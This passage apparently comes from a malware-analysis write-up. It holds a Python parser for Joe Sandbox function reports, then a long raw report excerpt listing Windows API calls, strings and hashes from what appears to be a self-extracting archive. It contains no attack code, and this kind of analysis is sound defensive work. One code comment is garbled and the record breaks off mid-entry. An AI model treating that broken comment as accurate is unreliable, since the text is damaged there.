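    args = m.group("args").split(",") if m.group("args") is not None else []
    return {"name": m.group("name"), "module": m.group("module"),
            "args": args, "ref": m.group("ref").upper(), "via": caller}


def parse_records(text: str) -> List[Dict]:
    records: List[Dict] = []
    current: Optional[Dict] = None
    section = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line == "APIs":          # every function record opens with its API list
            current = _new_record()
            records.append(current)
            section = "APIs"
            continue
        if line in SECTION_HEADERS:
            section = line
            continue
        if current is None or not line.startswith(BULLET):
            continue
        body = line[len(BULLET):].strip()
        if section == "APIs":
            sub = SUBCALL_RE.match(body)
            call = (_parse_call(sub.group("rest"), sub.group("fn").upper())
                    if sub else _parse_call(body, None))
            if call:
                current["apis"].append(call)
        elif section == "Memory Dump Source":
            m = SOURCE_RE.match(body)
            if m and current["source_file"] is None:
                current["source_file"] = m.group("file")
                current["offset"] = m.group("offset")
        elif section == "Similarity":
            key, _, value = body.partition(":")
            current["similarity"][key.strip()] = value.strip()
            if key.strip() == "String ID":
                # '$' is the report's separator; a literal '$' inside a string
                # (such as "F$($AF above) cannot be told apart from it.
                current["strings"] = [s for s in value.strip().split("$") if s]
    return records


def resolved_imports(records: List[Dict]) -> List[Dict]:
    """GetProcAddress call sites with the export name they resolve."""
    return [{"ref": c["ref"], "export": c["args"][1],
             "opcode_id": r["similarity"].get("Opcode ID")}
            for r in records for c in r["apis"]
            if c["name"] == "GetProcAddress" and len(c["args"]) >= 2]


def index_by_opcode_id(records: List[Dict]) -> Dict[str, Dict]:
    """Opcode ID -> record, for matching functions across reports."""
    return {r["similarity"]["Opcode ID"]: r
            for r in records if "Opcode ID" in r["similarity"]}
```

Feeding a whole report's function section through `parse_records` and joining `index_by_opcode_id` output from two reports gives the overlap of identical functions; `resolved_imports` is the quick view of which exports a sample resolves at run time rather than through its import table.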
                                                                  APIs
                                                                    • Part of subcall function 004605DA: _wcslen.LIBCMT ref: 004605E0
                                                                    • Part of subcall function 0045B92D: _wcsrchr.LIBVCRUNTIME ref: 0045B944
                                                                  • _wcslen.LIBCMT ref: 0045C197
                                                                  • _wcslen.LIBCMT ref: 0045C1DF
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: _wcslen$_wcsrchr
                                                                  • String ID: .exe$.rar$.sfx
                                                                  • API String ID: 3513545583-31770016
                                                                  • Opcode ID: e684ee430c050c3eee9839c62fafe6ed6f678b40fe9818544e9caa2465504ba4
                                                                  • Instruction ID: ed39bd38e41d6d95225a248d13de3f4004fd9480b213632090b10e4e111698bf
                                                                  • Opcode Fuzzy Hash: e684ee430c050c3eee9839c62fafe6ed6f678b40fe9818544e9caa2465504ba4
                                                                  • Instruction Fuzzy Hash: 4641F92554071199C731AF648892A7F73A4EF41B4AF14494FFD826B2C3EB5C4D8AC39E
                                                                  APIs
                                                                  • _wcslen.LIBCMT ref: 0045BB27
                                                                  • GetCurrentDirectoryW.KERNEL32(000007FF,?,?,?,?,00000000,?,?,0045A275,?,?,00000800,?,0045A23A,?,0045755C), ref: 0045BBC5
                                                                  • _wcslen.LIBCMT ref: 0045BC3B
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: _wcslen$CurrentDirectory
                                                                  • String ID: UNC$\\?\
                                                                  • API String ID: 3341907918-253988292
                                                                  • Opcode ID: 6dba796ecc80d6a1a07d8bebd41174734af4e35b398bfbb8343707d4bcf58799
                                                                  • Instruction ID: b1e48187d907088b53c1a2304adc973f8774ccb596657c753a4c9f5b6a549522
                                                                  • Opcode Fuzzy Hash: 6dba796ecc80d6a1a07d8bebd41174734af4e35b398bfbb8343707d4bcf58799
                                                                  • Instruction Fuzzy Hash: E941A331400215A6DB22AF21CC02EEF7768EF41356F10446FFD55A3252EB78AE988B9D
                                                                  APIs
                                                                  • _wcschr.LIBVCRUNTIME ref: 0046CD84
                                                                    • Part of subcall function 0046AF98: _wcschr.LIBVCRUNTIME ref: 0046B033
                                                                    • Part of subcall function 00461FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,0045C116,00000000,.exe,?,?,00000800,?,?,?,00468E3C), ref: 00461FD1
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: _wcschr$CompareString
                                                                  • String ID: <$HIDE$MAX$MIN
                                                                  • API String ID: 69343711-3358265660
                                                                  • Opcode ID: 7ec97e8b3107d0fc7c1305b386cba1f6ec711c437a9d64b96c195750c721f065
                                                                  • Instruction ID: 8673bdb9d1767c08218280c38934cc9a1a708029a295aff40ea210eaccf0b074
                                                                  • Opcode Fuzzy Hash: 7ec97e8b3107d0fc7c1305b386cba1f6ec711c437a9d64b96c195750c721f065
                                                                  • Instruction Fuzzy Hash: E1319571A002099ADF25DB51CC85EEF73BCEB14354F008567E905E7280FBB88A848F9A
                                                                  APIs
                                                                  • GetDC.USER32(00000000), ref: 0046AAD2
                                                                  • GetObjectW.GDI32(?,00000018,?), ref: 0046AB01
                                                                  • ReleaseDC.USER32(00000000,?), ref: 0046AB99
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: ObjectRelease
                                                                  • String ID: -F$7F
                                                                  • API String ID: 1429681911-476403228
                                                                  • Opcode ID: 17da887a813d0f7f72c387e54cee124f23fa1b92f9c3cf580d51d79c328dd4bf
                                                                  • Instruction ID: 09d35b1629c41f2719024e9b186b5b9ee49f1964cefad57b1349273f853e8aed
                                                                  • Opcode Fuzzy Hash: 17da887a813d0f7f72c387e54cee124f23fa1b92f9c3cf580d51d79c328dd4bf
                                                                  • Instruction Fuzzy Hash: D221FA72108304AFD301AFA6DC88E6FBFE9FF89356F050929FA4592124D7319A548B66
                                                                  APIs
                                                                  • _swprintf.LIBCMT ref: 0045B9B8
                                                                    • Part of subcall function 00454092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 004540A5
                                                                  • _wcschr.LIBVCRUNTIME ref: 0045B9D6
                                                                  • _wcschr.LIBVCRUNTIME ref: 0045B9E6
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: _wcschr$__vswprintf_c_l_swprintf
                                                                  • String ID: %c:\
                                                                  • API String ID: 525462905-3142399695
                                                                  • Opcode ID: 56404035c02221d8a4fa0abe07827629002ccd8dce23069e6aee4296c9222195
                                                                  • Instruction ID: 8a7a3ae8d6ef4eb50ebb5d448ae8bab54ece381a07feea4d4992068565ae27d4
                                                                  • Opcode Fuzzy Hash: 56404035c02221d8a4fa0abe07827629002ccd8dce23069e6aee4296c9222195
                                                                  • Instruction Fuzzy Hash: 5101F96350031165D631AB769C41DBBA79CDF91775B50840FF944D7283EB28D84883F9
                                                                  APIs
                                                                    • Part of subcall function 00451316: GetDlgItem.USER32(00000000,00003021), ref: 0045135A
                                                                    • Part of subcall function 00451316: SetWindowTextW.USER32(00000000,004835F4), ref: 00451370
                                                                  • EndDialog.USER32(?,00000001), ref: 0046B2BE
                                                                  • GetDlgItemTextW.USER32(?,00000066,?,00000080), ref: 0046B2D6
                                                                  • SetDlgItemTextW.USER32(?,00000067,?), ref: 0046B304
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: ItemText$DialogWindow
                                                                  • String ID: GETPASSWORD1$xzJ
                                                                  • API String ID: 445417207-2247322485
                                                                  • Opcode ID: c9088e5f7b15d8bf5418bc4b8db5fcbfadb406cc3dc986986a67dce2b63c81ae
                                                                  • Instruction ID: 8b33cee9cccef12284076cbe0a2e8af0741397f1a3a43997b18591130312f62b
                                                                  • Opcode Fuzzy Hash: c9088e5f7b15d8bf5418bc4b8db5fcbfadb406cc3dc986986a67dce2b63c81ae
                                                                  • Instruction Fuzzy Hash: 15110832A40114B7DB219E659C5DFFF376CEF1A705F100062FE45F2280E7A8998587AB
                                                                  APIs
                                                                  • LoadBitmapW.USER32(00000065), ref: 0046B6ED
                                                                  • GetObjectW.GDI32(00000000,00000018,?), ref: 0046B712
                                                                  • DeleteObject.GDI32(00000000), ref: 0046B744
                                                                  • DeleteObject.GDI32(00000000), ref: 0046B767
                                                                    • Part of subcall function 0046A6C2: FindResourceW.KERNEL32(?,PNG,00000000,?,?,?,0046B73D,00000066), ref: 0046A6D5
                                                                    • Part of subcall function 0046A6C2: SizeofResource.KERNEL32(00000000,?,?,?,0046B73D,00000066), ref: 0046A6EC
                                                                    • Part of subcall function 0046A6C2: LoadResource.KERNEL32(00000000,?,?,?,0046B73D,00000066), ref: 0046A703
                                                                    • Part of subcall function 0046A6C2: LockResource.KERNEL32(00000000,?,?,?,0046B73D,00000066), ref: 0046A712
                                                                    • Part of subcall function 0046A6C2: GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,0046B73D,00000066), ref: 0046A72D
                                                                    • Part of subcall function 0046A6C2: GlobalLock.KERNEL32(00000000), ref: 0046A73E
                                                                    • Part of subcall function 0046A6C2: CreateStreamOnHGlobal.COMBASE(00000000,00000000,?), ref: 0046A762
                                                                    • Part of subcall function 0046A6C2: GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 0046A7A7
                                                                    • Part of subcall function 0046A6C2: GlobalUnlock.KERNEL32(00000000), ref: 0046A7C6
                                                                    • Part of subcall function 0046A6C2: GlobalFree.KERNEL32(00000000), ref: 0046A7CD
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: Global$Resource$Object$BitmapCreateDeleteLoadLock$AllocFindFreeFromGdipSizeofStreamUnlock
                                                                  • String ID: ]
                                                                  • API String ID: 1797374341-3352871620
                                                                  • Opcode ID: 1c5465d2c9dfb1583c91a083879dad4e14ce741a2b73abbff737f73f7dcfbe83
                                                                  • Instruction ID: 0c55648e1fd035a426445dd7d786f5fe2dee3143a7f4df3872d5d3036eeda1c2
                                                                  • Opcode Fuzzy Hash: 1c5465d2c9dfb1583c91a083879dad4e14ce741a2b73abbff737f73f7dcfbe83
                                                                  • Instruction Fuzzy Hash: 9101213250060167C7117B758C0AA6B7AB99FC0B57F09002AB800B3291EB298D1946AB
                                                                  APIs
                                                                    • Part of subcall function 00451316: GetDlgItem.USER32(00000000,00003021), ref: 0045135A
                                                                    • Part of subcall function 00451316: SetWindowTextW.USER32(00000000,004835F4), ref: 00451370
                                                                  • EndDialog.USER32(?,00000001), ref: 0046D64B
                                                                  • GetDlgItemTextW.USER32(?,00000068,00000800), ref: 0046D661
                                                                  • SetDlgItemTextW.USER32(?,00000066,?), ref: 0046D675
                                                                  • SetDlgItemTextW.USER32(?,00000068), ref: 0046D684
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: ItemText$DialogWindow
                                                                  • String ID: RENAMEDLG
                                                                  • API String ID: 445417207-3299779563
                                                                  • Opcode ID: c500c97b66a3f20f2d469a63b338e52fe997a69a96bc507a32a205707326261c
                                                                  • Instruction ID: a46067860aca403f0b3f2a1e1f91d1bf8edea84ffd2fbb6e7048df089371e9d9
                                                                  • Opcode Fuzzy Hash: c500c97b66a3f20f2d469a63b338e52fe997a69a96bc507a32a205707326261c
                                                                  • Instruction Fuzzy Hash: 1C01F933F843107BD2205F69DD09F577B5CAB5A702F110532F605A11D0D6A599058B7F
                                                                  APIs
                                                                  • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00477E24,00000000,?,00477DC4,00000000,0048C300,0000000C,00477F1B,00000000,00000002), ref: 00477E93
                                                                  • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00477EA6
                                                                  • FreeLibrary.KERNEL32(00000000,?,?,?,00477E24,00000000,?,00477DC4,00000000,0048C300,0000000C,00477F1B,00000000,00000002), ref: 00477EC9
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: AddressFreeHandleLibraryModuleProc
                                                                  • String ID: CorExitProcess$mscoree.dll
                                                                  • API String ID: 4061214504-1276376045
                                                                  • Opcode ID: 93d9e975007178cdfec8ebb019e98acdf1e443374a19ffda12c1ca6ea01ba15e
                                                                  • Instruction ID: b3be6e1baadaa274a2d5f4ae79f245391cb9a54f1c3ab4b194cf5724c81ebddc
                                                                  • Opcode Fuzzy Hash: 93d9e975007178cdfec8ebb019e98acdf1e443374a19ffda12c1ca6ea01ba15e
                                                                  • Instruction Fuzzy Hash: 09F04931900108BBCB119F91DC09B9EBF74EB44B16F5145AEF80592250DB345E44C758
                                                                  APIs
                                                                    • Part of subcall function 0046081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00460836
                                                                    • Part of subcall function 0046081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0045F2D8,Crypt32.dll,00000000,0045F35C,?,?,0045F33E,?,?,?), ref: 00460858
                                                                  • GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 0045F2E4
                                                                  • GetProcAddress.KERNEL32(004981C8,CryptUnprotectMemory), ref: 0045F2F4
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: AddressProc$DirectoryLibraryLoadSystem
                                                                  • String ID: Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory
                                                                  • API String ID: 2141747552-1753850145
                                                                  • Opcode ID: ebc04aaa932fac62ffa3a8dd7d5c0e2d1bd9d2df1423e900106cc6ce3d86b51d
                                                                  • Instruction ID: 06fea8cf7dedb8a9778110f9358361a5c805f46a3057d5cb860000a1cce210cf
                                                                  • Opcode Fuzzy Hash: ebc04aaa932fac62ffa3a8dd7d5c0e2d1bd9d2df1423e900106cc6ce3d86b51d
                                                                  • Instruction Fuzzy Hash: F5E0DF708007029EC721AF34D849B0A7AD46F04F0AF208C6FF8DA93240D6B8D0848B08
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: AdjustPointer$_abort
                                                                  • String ID:
                                                                  • API String ID: 2252061734-0
                                                                  • Opcode ID: e2c0285202181cd4929b3128bbad00e8238c8d935321298d0a75da5300e5aa5d
                                                                  • Instruction ID: e01c97d557a4841a7c60e69abc675a3568451f798f8d79228ce73da840bd7fd0
                                                                  • Opcode Fuzzy Hash: e2c0285202181cd4929b3128bbad00e8238c8d935321298d0a75da5300e5aa5d
                                                                  • Instruction Fuzzy Hash: 3C51E172501212EFDB298F15DA45BEB73A4FF10310F24852FE809572A1E7B9ED40D798
                                                                  APIs
                                                                  • GetEnvironmentStringsW.KERNEL32 ref: 0047BF39
                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0047BF5C
                                                                    • Part of subcall function 00478E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0047CA2C,00000000,?,00476CBE,?,00000008,?,004791E0,?,?,?), ref: 00478E38
                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0047BF82
                                                                  • _free.LIBCMT ref: 0047BF95
                                                                  • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0047BFA4
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                  • String ID:
                                                                  • API String ID: 336800556-0
                                                                  • Opcode ID: 6502d2f1f209bcc0f455028f5fa7b986d13183921ca02e228d0960e26e16a2bb
                                                                  • Instruction ID: 6ca1044872bff7352cb166a4fed909d2476f90894f4a3152311e9c64524e1203
                                                                  • Opcode Fuzzy Hash: 6502d2f1f209bcc0f455028f5fa7b986d13183921ca02e228d0960e26e16a2bb
                                                                  • Instruction Fuzzy Hash: 5901B1726012117F23211A765C4CEFF6A6DDEC2FA9315852EF90CC2201EF688D0286F8
                                                                  APIs
                                                                  • GetLastError.KERNEL32(?,00491030,00000200,004791AD,0047617E,?,?,?,?,0045D984,?,?,?,00000004,0045D710,?), ref: 0047986E
                                                                  • _free.LIBCMT ref: 004798A3
                                                                  • _free.LIBCMT ref: 004798CA
                                                                  • SetLastError.KERNEL32(00000000,00483A34,00000050,00491030), ref: 004798D7
                                                                  • SetLastError.KERNEL32(00000000,00483A34,00000050,00491030), ref: 004798E0
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorLast$_free
                                                                  • String ID:
                                                                  • API String ID: 3170660625-0
                                                                  • Opcode ID: a7ba6349bccf49e5e22f338b0c701598df91143d3ba7cb7d1f700f5b09b42936
                                                                  • Instruction ID: e591636e6a52057afeb3e08313fd086c9b356650e11e5a3c1ccbf038d16c31de
                                                                  • Opcode Fuzzy Hash: a7ba6349bccf49e5e22f338b0c701598df91143d3ba7cb7d1f700f5b09b42936
                                                                  • Instruction Fuzzy Hash: B80126321606016BC22237266C85DDF2529DFD3779726853FF40C92291EE2C8C02426F
                                                                  APIs
                                                                    • Part of subcall function 004611CF: ResetEvent.KERNEL32(?), ref: 004611E1
                                                                    • Part of subcall function 004611CF: ReleaseSemaphore.KERNEL32(?,00000000,00000000), ref: 004611F5
                                                                  • ReleaseSemaphore.KERNEL32(?,00000040,00000000), ref: 00460F21
                                                                  • CloseHandle.KERNEL32(?,?), ref: 00460F3B
                                                                  • DeleteCriticalSection.KERNEL32(?), ref: 00460F54
                                                                  • CloseHandle.KERNEL32(?), ref: 00460F60
                                                                  • CloseHandle.KERNEL32(?), ref: 00460F6C
                                                                    • Part of subcall function 00460FE4: WaitForSingleObject.KERNEL32(?,000000FF,00461206,?), ref: 00460FEA
                                                                    • Part of subcall function 00460FE4: GetLastError.KERNEL32(?), ref: 00460FF6
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
